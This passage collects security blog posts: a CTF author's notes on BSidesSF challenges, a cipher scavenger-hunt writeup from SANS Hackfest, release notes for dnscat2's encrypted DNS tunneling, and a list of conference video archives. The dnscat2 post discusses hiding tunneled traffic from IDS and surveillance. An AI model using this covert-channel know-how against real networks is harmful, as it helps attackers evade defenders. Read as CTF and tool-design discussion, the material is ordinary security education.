Now, here is where it gets a bit fun. I agreed to write the front-end if he wrote the back-end. The front-end was almost exactly easyauth, except the cookie was signed. We decided to use an md5sum-like interface, which was a bit awkward in PHP, but that was fine. I wrote and tested everything with md5sum, and then awaited the vhash binary.

When he sent it, I assumed vhash was a drop-in replacement without thinking too much about it. I updated the hash binary, and could log in just fine, and that was it.

When the challenge came out, the first solve happened in only a couple minutes. That doesn't seem possible! I managed to get in touch with the solver, and he said that he just changed the cookie and ignored the hash. Oh no! Our only big mess-up!

After investigation, we discovered that the agreed md5sum-like interface meant, to @bmenrigh, that the data would come on stdin, and to me it meant that the file would be passed as a parameter. So, we were hashing the empty string every time. Oops!

Luckily, we found it, fixed it, and rolled out an updated version shortly after. The original challenge became an easy 450-pointer for anybody who bothered to try, and the real challenge was only solved by a few, as intended.

dnscap [500]

dnscap is simply a packet capture from dnscat2, running in unencrypted mode, over a laggy connection (coincidentally, I'm writing this writeup at the same bar where I wrote the original challenge!). In dnscat2, I sent a .png file that contains the dnscat2 logo, as well as the flag. Product placement, anyone?

I assumed it would be fairly difficult to disentangle the packets going through, which is why we gave it a high point-value. Ultimately, it was easier than we'd expected, and people were able to solve it fairly quickly.

nibbler [666]

And finally, my old friend nibbler.

At some point in the past few months, I had the realization: nibbles (the snake game for QBasic where I learned to program) sounds like nibble (a 4-bit value). I forget where it came from exactly, but I had the idea to build a nibbles-clone with a vulnerability where you'd have to exploit it by collecting the 'fruit' at the right time.

I originally stored the scores in an array, and each 'fruit' would be worth between 00 and FF points. You'd have to overflow the stack and build an exploit by gathering fruit with the snake. You'll notice that the name that I ask for at the start uses read() - that's so it can contain NUL bytes, so you can build a ROP-chain in your name.

I realized that picking values between 00 and FF would take FOREVER, and wanted to get back to the original idea: nibbles! But I couldn't think of a way to make it realistic while only collecting 4-bit values.

Eventually, I decided to drop the premise of performing an exploit, and instead, just let the user write shellcode that is run directly. As a result, it went from a pwn to a programming challenge, but I didn't re-categorize it, largely because we don't have programming challenges.

It ended up being difficult, but solvable! One of my favourite writeups is here; I HIGHLY recommend reading it. My favourite part is that he named the snakes and drew some damn sexy images!

I just want to give a shout out to the poor soul, who I won't name here, who solved this level BY HAND, but didn't cat the flag file fast enough. I shouldn't have had the 10-second timeout, but we did. As a result, he didn't get the flag. I'm so sorry. :(

Fun fact: @bmenrigh was confident enough that this level was impossible to solve that he made me a large bet that less than 2 people would solve it. Because we had 9 solvers, I won a lot of alcohol! :)

Conclusion

Hopefully you enjoyed hearing a little about the BSidesSF CTF challenges I wrote! I really enjoyed writing them, and then seeing people working on solving them!

On some of the challenges, I tried to teach something (or have a teachable lesson, something I can use when I teach). On some, I tried to make something pretty difficult. On some, I fell somewhere between. But there's one thing they have in common: I tried to make my own challenges as easy as possible to test and validate. :)

SANS Hackfest writeup: Hackers of Gravity

A few weeks ago, SANS hosted a private event at the Smithsonian's Air and Space Museum as part of SANS Hackfest. An evening in the Air and Space Museum just for us! And to sweeten the deal, they set up a scavenger hunt called "Hackers of Gravity" to work on while we were there!

We worked in small teams (I teamed up with Eric, who's also writing this blog with me). All they told us in advance was to bring a phone, so every part of this was solved with our phones and Google.

Each level began with an image, typically with a cipher embedded in it. After decoding the cipher, the solution and the image itself were used together to track down a related artifact.

This is a writeup of that scavenger hunt. :)

Challenge 1: Hacker of Tenacity

The order of the challenges was actually randomized, so this may not be the order that anybody else had (homework: there are 5040 possible orderings of challenges, and about 100 people attending; what are the odds that two people had the same order? The birthday paradox applies).

The first challenge was simply text:

Sometimes tenacity is enough to get through a difficult challenge. This Hacker of Gravity never gave up and even purposefully created discomfort to survive their challenge against gravity. Do you possess the tenacity to break this message? 

T05ZR1M0VEpPUlBXNlpTN081VVdHMjNGT0pQWEdaTEJPUlpRPT09PQ==

Based on the character set, we immediately recognized it as Base64. We found an online decoder and it decoded to:

ONYGS4TJORPW6ZS7O5UWG23FOJPXGZLBORZQ====


We recognized that as Base32 - Base64 will never have four "====" signs at the end, and Base32 typically only contains uppercase characters and numbers. (Quick plug: I'm currently working on Base32 support for dnscat2, which is another reason I quickly recognized it!)

Anyway, the Base32 version decoded to spirit_of_wicker_seats, and Eric recognized "Spirit" as a possible clue and searched for "Spirit of St Louis Wicker Seats", which revealed the following quote from the Wikipedia article on the Spirit of St. Louis: "The stiff wicker seat in the cockpit was also purposely uncomfortable".
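
Both stages are easy to reproduce with Python's standard library:

    import base64

    outer = "T05ZR1M0VEpPUlBXNlpTN081VVdHMjNGT0pQWEdaTEJPUlpRPT09PQ=="
    inner = base64.b64decode(outer)           # the Base32 string shown above
    print(base64.b32decode(inner).decode())   # -> spirit_of_wicker_seats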

The Spirit of St. Louis was one of the first planes we spotted, so we scanned the QR code and found the solution: lots_of_fuel_tanks!

Challenge 2: Hacker of Navigation

We actually got stuck on the second challenge for awhile, but eventually we got an idea of how these challenges tend to work, after which we came back to it.

We were given a fragment of a letter:

The museum archives have located part of a letter in an old storage locker from some previously lost collection. They'd REALLY like your help finding the author.

You'll note at the bottom-left corner it implies that "A = 50 degrees". We didn't notice that initially. :)

What we did notice was that the degrees were all a) multiples of 10, and b) below 260. That led us to believe that they were numbered letters, times ten (so A = 10, B = 20, C = 30, etc).

The numbers were: 100 50 80 90 80 100 50 230 120 130 190 180 130 230 240 50.

Dividing by 10 gives 10 5 8 9 8 10 5 23 12 13 19 18 13 23 24 5.

Converting that to the corresponding letters gave us JEHIH JEWLMSRMWXE. Clearly not an English sentence, but it looks like a cryptogram (JEHIH looks like "THERE" or "WHERE").

That's when we noticed the "A = 50" in the corner, and realized that things were probably shifted by 5. Instead of manually converting it, we found a shift cipher bruteforcer that we could use. The result was: FADED FASHIONISTA
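
The online tool just tries every shift; a quick sketch of the same brute force:

    ciphertext = "JEHIHJEWLMSRMWXE"
    for shift in range(26):
        candidate = "".join(chr((ord(c) - ord("A") - shift) % 26 + ord("A"))
                            for c in ciphertext)
        print(shift, candidate)   # shift 4 prints FADEDFASHIONISTA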

Searching for "Faded Fashionista Air and Space" led us to this Smithsonian Article: Amelia Earhart, Fashionista. Neither of us knew where her exhibit was, but eventually we tracked it down on the map and walked around it until we found her Lockheed Vega, the QR code scanned to amelias_vega.

Challenge 3: Hacker of Speed

This was an image of some folks ready to board a plane or something:

This super top secret photo has been censored. The security guys looked at this SO fast, maybe they missed something?

Because of the hint, we started looking for mistakes in the censoring and noticed that they're wearing boots that say "X-15":

We found the X-15 page on the museum's Web site and remembered seeing the plane on the 2nd floor. We reached the artifact and determined that the QR code read faster_than_superman.

Once we got to the artifact, we noticed that we hadn't broken the code yet. Looking carefully at the image, we saw the text at the bottom, nbdi_tjy_qpjou_tfwfo_uxp.

As an avid cryptogrammer, I recognized tfwfo as likely being "never". Since 'e' is one character before 'f', it seemed likely that it was a single shift ('b'->'a', 'c'->'b', etc). I mentally shifted the first couple letters of the sentence, and it looked right, so I did the entire string while Eric wrote it down: mach_six_point_seven_two.

The funny thing is, the word was "seven", not "never", but the "e"s still matched!

Challenge 4: Hacker of Design

While researching some physics based penetration testing, you find this interesting diagram. You feel like you've seen this device before... maybe somewhere or on something in the Air and Space museum?

The diagram reminded Eric of an engine he had seen on an earlier visit, so we tracked it down on the other side of the museum:

Unfortunately, there was no QR code there, so we decided to work on decoding the challenge to discover the location of the correct artifact.

Now that we'd seen the hint on Challenge 2, we were more prepared for a diagram to help us! In this case, it was a drawing of an atom and the number "10". We concluded that the numbers probably referred to atomic numbers of elements on the periodic table, and converted them as such:

10=>Ne
74=>W
... and so on.

After decoding the full string, we ended up with:

new_plan_schwalbe

We actually made a mistake in decoding the string, but managed to find it anyways thanks to search autocorrect. :)

After searching for "schwalbe air and space", we found this article, which led us to the artifact: the Messerschmitt Me 262 A-1a Schwalbe (Swallow). The QR code scanned revealed the_swallow.

Challenge 5: Hacker of Distance

While at the bar, listening to some Dual Core, planning your next conference-fest with some fellow hackers, you find this interesting napkin. Your mind begins to wander. Why doesn't Dual Core have a GOLDEN RECORD?! Also, is this napkin trying to tell you something in a roundabout way?

The hidden text on this one was obvious… morse code! Typing the code into a phone (not fun!), we ended up with .- -.. .- ... - .-. .- .--. . .-. .- ... .--. . .-. .-, which translates to ADASTRAPERASPERA
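
The decode is easy to reproduce; a sketch with just the symbols that appear here:

    MORSE = {".-": "A", "-..": "D", "...": "S", "-": "T",
             ".-.": "R", ".": "E", ".--.": "P"}

    code = ".- -.. .- ... - .-. .- .--. . .-. .- ... .--. . .-. .-"
    print("".join(MORSE[sym] for sym in code.split()))  # ADASTRAPERASPERA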

According to Google, that slogan is used by a thousand different organizations, none of which seemed to be space or air related. However, searching for "Golden Record Air and Space" returned several results for the Voyager space probe. We looked at our map and scurried to the exhibit on the other side of the museum:

Once we made it to the exhibit finding the QR code was easy, scanning it revealed, the_princess_is_in_another_castle. The decoy flag!

We tried searching keywords from the napkin, but none of the results seemed promising. After a few frustrating minutes we saw the museum banquet director and asked him for help. He told us that the plane we were looking for was close to the start of the challenge, so we made a dash for the first floor and found the correct Voyager exhibit:

Scanning the QR code revealed the code, missing_canards.

Challenge 6: Hacker of Guidance

The sixth challenge gave us a map with some information:

You have intercepted this map that appears to target something. The allies would really like to know the location of the target. Also, they'd like to know what on Earth is at that location.

We immediately noticed the hex-encoded numbers on the left:

35342e3133383835322c
31332e373637373235

Which translates to 54.138852,13.767725. We googled the coordinates, and it turned out to be a location in Germany: Flughafenring, 17449 Peenemünde, Germany.
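
The conversion is a one-liner:

    print(bytes.fromhex("35342e3133383835322c" "31332e373637373235").decode())
    # -> 54.138852,13.767725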

After many failed searches we tried "Peenemünde ww2 air and space", which led to a reference to the German V2 Rocket. Here is the exhibit and QR code:

Scanning the QR code revealed aggregat_4, the formal name for the V-2 rocket.

Challenge 7: Hacker of Coding

This is an image with a cipher on the right:

Your primary computer's 0.043MHz CPU is currently maxed out with other more important tasks, so converting all these books of source code to assembly is entirely up to you.

On the chalkboard is a cipher:

We couldn't remember what it was called, and ended up searching for "line dot cipher", which immediately identified it as a pigpen cipher. The pigpen cipher can be decoded with this graphic:

Essentially, you find the shape containing the letter that corresponds to the shape in that graphic. So, the first letter is ">" on the chalkboard, which maps to 'T'. The second is the upper three quarters of a square, which maps to 'H', and the third is a square, which maps to 'E'. And so on.

Initially we found a version that didn't map to the proper English characters, and translated it to:

Later, we did it right and found the text "THE BEST SHIP TO COME DOWN THE LINE"

To find the artifact, we googled "0.043MHz", and immediately discovered it was "Apollo 11".

The QR code scanned to the_eleventh_apollo

And that's it!

And that's the end of the cipher portion of the challenge! We finished in first place by only a few minutes. :)

The last part of the challenge involved throwing wooden airplanes. Because our plane didn't go backwards, it wasn't the worst, but it was nothing to write home about!

But in the end, it was a really cool way to see a bunch of artifacts and also break some codes!

dnscat2: now with crypto!

Hey everybody,

Live from the SANS Pentest Summit, I'm excited to announce the latest beta release of dnscat2: 0.04! Besides some minor cleanups and UI improvements, there is one serious improvement: all dnscat2 sessions are now encrypted by default!

Read on for some user information, then some implementation details for those who are interested! For all the REALLY gory information, check out the protocol doc!

Tell me what's new!

By default, when you start a dnscat2 client, it now performs a key exchange with the server, and uses a derived session key to encrypt all traffic. This has the huge advantage that passive surveillance and IDS and such will no longer be able to see your traffic. But the disadvantage is that it's vulnerable to a man-in-the-middle attack - assuming somebody takes the time and effort to perform a man-in-the-middle attack against dnscat2, which would be awesome but seems unlikely. :)

By default, all connections are encrypted, and the server will refuse to allow cleartext connections. If you start the server with --security=open (or run set security=open), then the client decides the security level - including cleartext.

If you pass the server a --secret string (see below), then the server will require clients to authenticate using the same --secret value. That can be turned off by using --security=open or --security=encrypted (or the equivalent set commands).

Let's look at the man-in-the-middle protection...

Short authentication strings

First, by default, a short authentication string is displayed on both the client and the server. Short authentication strings, inspired by ZRTP and Silent Circle, are a visual way to tell if you're the victim of a man-in-the-middle attack.

Essentially, when a new connection is created, the user has to manually match the short authentication strings on the client and the server. If they're the same, then it's a legit connection. Here's what it looks like on the client:

Encrypted session established! For added security, please verify the server also displays this string:

Tort Hither Harold Motive Nuns Unwrap

And the server:

New window created: 1
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

>> Tort Hither Harold Motive Nuns Unwrap

There are 256 different possible words, so six words gives 48 bits of protection. While a 48-bit key can eventually be bruteforced, in this case it has to be done in real time, which is exceedingly unlikely.

Authentication

Alternatively, a pre-shared secret can be used instead of a short authentication string. When you start the server, you pass in a --secret value, such as --secret=pineapple. Clients with the same secret will create an authenticator string based on the password and the cryptographic keys, and send it to the server, encrypted, after the key exchange. Clients that use the wrong key will be summarily rejected.

Details on how this is implemented are below.

How stealthy is it?

To be perfectly honest: not completely.

The key exchange is pretty obvious. A 512-bit value has to be sent via DNS, and a 512-bit response has to come back. That's pretty big, and stands out.

After that, every packet has an unencrypted 40-bit (5-byte) header and an unencrypted 16-bit (2-byte) nonce. The header contains three bytes that don't really change, and the nonce is incremental. Any system that knows to look for dnscat2 will be able to find that.

It's conceivable that I could make this more stealthy, but anybody who's already trying to detect dnscat2 traffic will be able to update the signatures that they would have had to write anyway, so it becomes a cat-and-mouse game.

Of course, that doesn't stop people from patching things. :)

The plus side, however, is that none of your data leaks! And somebody would have to be specifically looking for dnscat2 traffic to recognize it.

What are the hidden costs?

Encrypted packets have 64 bits (8 bytes) of extra overhead: a 16-bit (two-byte) nonce and a 48-bit (six-byte) signature on each packet. Since DNS packets have between 200 and 250 bytes of payload space, that means we lose ~4% of our potential bandwidth.

Additionally, there's a key exchange packet and potentially an authentication packet. That's two extra roundtrips over a fairly slow protocol.

Other than that, not much changes, really. The encryption/decryption/signing/validation are super fast, and it uses a stream cipher, so the length of the messages doesn't change.

How do I turn it off?

The server always supports crypto; if you don't WANT crypto, you'll have to manually hack the server or use a version of dnscat2 server <=0.03. But you'll have to manually turn off encryption in the client; otherwise, the connection will fail.

Speaking of turning off encryption in the client: you can compile without encryption by using make nocrypto. You can also disable encryption at runtime with dnscat2 --no-encryption. On Visual Studio, you'll have to define "NO_ENCRYPTION". Note that the server, by default, won't allow either of those to connect unless you start it with --security=open.

Give me some technical details!

Your best bet if you're REALLY curious is to check out the protocol doc, where I document the protocol in full.

But I'll summarize it here. :)

The client starts a session by initiating a key exchange with the server. Both sides generate a random, 256-bit private key, then derive a public key using Elliptic Curve Diffie Hellman (ECDH). The client sends the public key to the server, the server sends a public key to the client, and they both agree on a shared secret.

That shared secret is hashed with a number of different values to derive purpose-specific keys - the client encryption key, the server encryption key, the client signing key, the server signing key, etc.
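
As a rough illustration of that derivation step (the labels and hash inputs here are placeholders, not dnscat2's actual strings; see the protocol doc for the real construction):

    import hashlib

    shared_secret = b"\x11" * 32  # placeholder for the ECDH output

    def derive(label: str) -> bytes:
        # Hash the shared secret with a distinct label per purpose.
        return hashlib.sha3_256(shared_secret + label.encode()).digest()

    client_write_key = derive("client_write_key")
    server_write_key = derive("server_write_key")
    client_mac_key   = derive("client_mac_key")
    server_mac_key   = derive("server_mac_key")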

Once the keys are agreed upon, all packets are encrypted and signed. The encryption is Salsa20 and uses one of the derived keys as well as an incremental nonce. After being encrypted, the encrypted data, the nonce, and the packet header are signed using SHA3, but truncated to 48 bits (6 bytes). 48 bits isn't very long for a signature, but space is at an extreme premium and for most attacks it would have to be broken in real time.

As an aside: I really wanted to encrypt the header instead of just signing it, but because of protocol limitations, that's simply not possible (because I have no way of knowing which packets belong to which session, the session_id has to be plaintext).

Immediately after the key exchange, the client optionally sends an authenticator over the encrypted session. The authenticator is based on a pre-shared secret (passed on the commandline) that the client and server pre-arrange in some way. That secret is hashed with both public keys and the secret (derived) key, as well as a different static string on the client and server. The client sends their authenticator to the server, and the server sends their authenticator to the client. In that way, both sides verify each other without revealing anything.

If the client doesn't send the authenticator, then a short authentication string is generated. It's based on a very similar hash to the authenticator, except without the pre-shared secret. The first 6 bytes are converted into words using a list of 256 English words, and are displayed on the screen. It's up to the user to verify them.
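
A toy version of that conversion, with a stand-in word list and hash input rather than dnscat2's real ones:

    import hashlib

    WORDS = [f"word{i:03d}" for i in range(256)]  # stand-in for 256 English words

    def short_auth_string(shared_material: bytes) -> str:
        digest = hashlib.sha3_256(shared_material).digest()
        return " ".join(WORDS[b] for b in digest[:6])  # 6 bytes -> 48 bits

    # Both peers compute this from the same key material and compare by eye.
    print(short_auth_string(b"derived-session-secret"))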

Because the nonce is only 16 bits, only 65536 roundtrips can be performed before running out. As such, the client may, at its own discretion (but before running out), initiate a new key exchange. It's identical to the original key exchange, except that it happens in a signed and encrypted packet. After the renegotiation is finished, both the client and server switch their nonce values back to 0 and stop accepting packets with the old keys.

And... that's about it! Keys are exchanged, an authenticator is sent or a short authentication string is displayed, all messages are signed and encrypted, and that's that!

Challenges

A few of the challenges I had to work through...

  • Because DNS has no concept of connections/sessions, I had to expose more information than I wanted in the packets (and because it's extremely length-limited, I had to truncate signatures)
  • I had originally planned to use Curve25519 for the key exchange, but there's no Ruby implementation
  • Finding a C implementation of ECC that doesn't require libcrypto or libssl was really hard
  • Finding a working SHA3 implementation in Ruby was impossible! I filed bugs against the three most popular implementations, and one of them actually took the time to fix it!
  • Dealing with DNS's gratuitous retransmissions and accidental drops was super painful and required some hackier code than I like to see in crypto (for example, an old key can still be used, even after a key exchange, until the new one is used successfully; the more secure alternative can't handle a dropped response packet, otherwise both peers would have different keys)

Shouts out

I just wanted to do a quick shout out to a few friends who really made this happen by giving me advice, encouragement, or just listening to me complaining.

So, in alphabetical order so nobody can claim I play favourites, I want to give mad propz to:

  • Alex Weber, who notably convinced me to use a proper key exchange protocol instead of just a static key (and who also wrote the Salsa20 implementation I used)
  • Brandon Enright, who gave me a ton of handy crypto advice
  • Eric Gershman, who convinced me to work on encryption in the first place, and who listened to my constant complaining about how much I hate implementing crypto

Video archives of security conferences and workshops


Just some links for your enjoyment

List of security conferences in 2014

Video archives:




AIDE (Appalachian Institute of Digital Evidence)


Blackhat
Botconf
Bsides
Chaos Communication Congress
Defcon
Derbycon
Digital Bond's S4x14
Circle City Con
GrrCON Information Security Summit & Hacker Conference
Hack in the box HITB
InfowarCon
Ruxcon
Shmoocon
ShowMeCon
SkyDogCon
TakeDownCon
Troopers (Heidelberg, Germany)
Workshops, How-tos, and Demos

Special thanks to Adrian Crenshaw for his collection of videos.